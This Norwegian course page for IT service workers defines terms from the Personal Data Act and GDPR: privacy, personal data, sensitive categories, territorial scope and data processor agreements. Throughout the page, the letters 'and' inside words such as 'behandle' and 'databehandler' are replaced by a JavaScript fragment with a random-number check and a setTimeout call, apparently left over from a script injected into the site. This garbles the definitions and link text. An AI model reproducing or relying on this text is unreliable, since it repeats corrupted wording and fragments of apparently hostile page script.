4.3.2 Personopplysningsloven – definisjoner

Personopplysningsloven definerer viktige begreper innenfor personvern. Du må kjenne til disse som IKT-servicemedarbeider.

 • Personvern
  • Selve begrepet personvern er ikke definert i selve loven, men betydningen er likevel viktig å ha klart for seg
  • Personvern defineres ofte som retten til privatliv
  • Personvern innebærer retten til å bestemme over dine egne personopplysninger, og hvordan disse skal brukes


Datatilsynet – definisjon av personvern

 • Personopplysning
  • Personopplysning er definert i artikkel 4 punkt 1) i Personopplysningsloven
  • En personopplysning er «enhver» opplysning om en identifisert eller identifiserbar fysisk person


Personopplysning definert i personopplysningsloven

 • Sensitive personopplysninger
  • Sensitive personopplysning er definert i artikkel 9 punkt 1) i Personopplysningsloven
  • Sensitive personopplysninger betegnes også som særlig kategori personopplysninger
  • I utgangspunktet er det ikke tillatt å behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle denne kategorien personopplysninger
  • Disse personopplysningene kan omfatte infomasjon om rase eller etnisk opprinnelse, politisk oppfatning, religion, fagforeningsmedlemskap, rulleblad/vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel, opplysninger om seksuelle forhold eller helseopplysninger


Sensitive personopplysninger definert i personopplysningsloven

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsgrunnlag/veileder-om-behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsgrunnlag/spesielt-om-sarlige-kategorier-av-personopplysninger-sensitive-personopplysninger-og-unntak/» target=»_blank» role=»button» rel=»noopener noreferrer»>
Datatilsynet om sensitive personopplysninger

 • Virkeområde
  • Virkeområdet til personopplysningsloven er av stor betydning
  • Artikkel 3 i loven slår fast at loven gjelder for borgere som befinner seg i EU-landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, selv om behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingen av deres personopplysninger foregår utenfor EU
  • Det innebærer at for eksempel amerikanske selskap som behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler dine personopplysninger, fordi du er kunde hos dem, må rette seg etter den europeiske personvernlovgivningen – GDPR
  • Det betyr igjen at dine rettigheter som privatperson er betydelig styrket og forbedret


Personopplysningslovens virkeområde

 • Databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andleravtale
  • Den registrerte: personen som gir samtykke til at egne personopplysninger behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andles og lagres
  • Behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsansvarlig: Ifølge lovens definisjoner har behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsansvarlig  ansvaret for behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger. Dette vil ofte være bedriftens ledelse/styre.
  • Databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler er den som faktisk gjennomfører behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingen av persopnopplysninger. Behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingen av data kan ofte ivaretas internt, men i mange tilfeller kan dette være satt ut (outsourcet) til en tredjepart.
  • Databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andleravtale skal opprettes mellom behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsansvarlig og databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler, dersom databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler er et eksternt firma eller underleverandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andør

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andleravtale/» target=»_blank» role=»button» rel=»noopener noreferrer»>
Datatilsynet om databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andleravtale


GDPR om databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler


Klikk her for neste post: 4.4.1 Personvernprinsippene